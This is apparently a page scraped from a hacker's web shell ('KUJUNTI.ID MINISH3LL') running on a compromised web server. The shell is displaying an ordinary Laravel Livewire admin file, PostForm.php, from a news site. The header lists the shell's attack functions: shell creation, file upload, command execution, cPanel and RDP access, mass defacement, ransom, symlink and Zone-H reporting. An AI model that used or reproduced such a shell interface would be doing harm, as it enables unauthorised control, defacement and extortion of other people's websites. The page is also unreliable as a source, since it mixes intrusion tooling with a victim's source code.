KUJUNTI.ID MINISH3LL
Path : /var/www/html/phkaynews-v2/app/Http/Livewire/Admin/Partcials/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : //var/www/html/phkaynews-v2/app/Http/Livewire/Admin/Partcials/PostForm.php


<?php

namespace App\Http\Livewire\Admin\Partcials;

use Livewire\Component;
use App\Models\Category;
use Livewire\WithFileUploads;
use Jantinnerezo\LivewireAlert\LivewireAlert;

class PostForm extends Component
{
    use LivewireAlert;
    use WithFileUploads;
    public $title, $keyword, $description, $feature_image, $category_ids, $public = true;
    public $no_image = 'backend/images/no-image.jpg', $old_image, $update_image, $edit = false;

    public function render()
    {
        return view('livewire.admin.partcials.post-form', [
            'categories' => Category::all()
        ]);
    }
}

© KUJUNTI.ID